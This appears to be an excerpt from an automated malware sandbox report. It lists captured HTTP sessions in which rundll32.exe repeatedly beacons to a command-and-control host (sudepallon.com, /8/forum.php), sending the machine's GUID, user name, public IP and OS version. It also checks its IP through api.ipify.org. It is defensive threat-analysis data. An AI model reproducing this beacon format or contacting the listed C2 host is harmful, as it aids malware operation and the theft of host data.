                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:44.340374947 CEST | 704 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:45 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 56 45 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVVEEARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               25 | 192.168.2.3 | 49745 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:45.217994928 CEST | 705 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:45.287050962 CEST | 705 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:46 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 46 55 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMFUNARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               26 | 192.168.2.3 | 49746 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:46.014456987 CEST | 708 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:46.081744909 CEST | 708 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:47 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cNCXMARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               27 | 192.168.2.3 | 49747 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:47.001276970 CEST | 709 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:47.067230940 CEST | 709 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:48 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMCXNARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               28 | 192.168.2.3 | 49748 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:47.939001083 CEST | 710 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:48.010452032 CEST | 711 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:49 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 51 4a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cFQJUARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               29 | 192.168.2.3 | 49749 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:48.825881004 CEST | 711 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:48.894567966 CEST | 712 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:50 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCZAXARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               3 | 192.168.2.3 | 49722 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:17.981962919 CEST | 666 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:18.053314924 CEST | 666 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:19 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKAZPARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               30 | 192.168.2.3 | 49750 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:49.831450939 CEST | 713 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:49.898061991 CEST | 713 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:51 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 59 42 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHYBSARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               31 | 192.168.2.3 | 49751 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:50.674189091 CEST | 720 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:50.741527081 CEST | 720 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:52 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJGTQARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               32 | 192.168.2.3 | 49752 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:51.066761017 CEST | 721 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:51.137720108 CEST | 721 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:52 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 4e 4d 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKNMPARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               33 | 192.168.2.3 | 49754 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:51.482800961 CEST | 728 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:51.552678108 CEST | 731 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:53 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQYBJARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               34 | 192.168.2.3 | 49755 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:51.864201069 CEST | 737 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:51.933939934 CEST | 738 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:53 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCAZXARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               35 | 192.168.2.3 | 49756 | 23.21.173.155 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:51.971111059 CEST | 738 | OUT | GET / HTTP/1.1
                              Accept: */*
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: api.ipify.org
                              Cache-Control: no-cache
                               Jul 9, 2021 03:11:52.079622030 CEST | 757 | IN | HTTP/1.1 200 OK
                              Server: Cowboy
                              Connection: keep-alive
                              Content-Type: text/plain
                              Vary: Origin
                              Date: Fri, 09 Jul 2021 01:11:52 GMT
                              Content-Length: 14
                              Via: 1.1 vegur
                              Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                              Data Ascii: 185.189.150.70


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               36 | 192.168.2.3 | 49758 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:52.373225927 CEST | 991 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:52.443495035 CEST | 1241 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 54 47 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cZTGAARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               37 | 192.168.2.3 | 49759 | 23.21.224.49 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:52.579963923 CEST | 1754 | OUT | GET / HTTP/1.1
                              Accept: */*
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: api.ipify.org
                              Cache-Control: no-cache
                               Jul 9, 2021 03:11:52.685327053 CEST | 2500 | IN | HTTP/1.1 200 OK
                              Server: Cowboy
                              Connection: keep-alive
                              Content-Type: text/plain
                              Vary: Origin
                              Date: Fri, 09 Jul 2021 01:11:52 GMT
                              Content-Length: 14
                              Via: 1.1 vegur
                              Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                              Data Ascii: 185.189.150.70


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               38 | 192.168.2.3 | 49760 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:52.665235043 CEST | 2500 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:52.735276937 CEST | 2562 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQCXJARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               39 | 192.168.2.3 | 49762 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:52.813720942 CEST | 2683 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                               Jul 9, 2021 03:11:52.878868103 CEST | 2689 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:54 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHZASARRABw==0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               4 | 192.168.2.3 | 49723 | 23.21.173.155 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:18.656306028 CEST | 667 | OUT | GET /?format=xml HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                              Host: api.ipify.org
                              Connection: Keep-Alive
                               Jul 9, 2021 03:11:18.807811022 CEST | 667 | IN | HTTP/1.1 200 OK
                              Server: Cowboy
                              Connection: keep-alive
                              Content-Type: text/plain
                              Vary: Origin
                              Date: Fri, 09 Jul 2021 01:11:18 GMT
                              Content-Length: 14
                              Via: 1.1 vegur
                              Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                              Data Ascii: 185.189.150.70


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               40 | 192.168.2.3 | 49763 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Jul 9, 2021 03:11:52.867273092 CEST | 2689 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
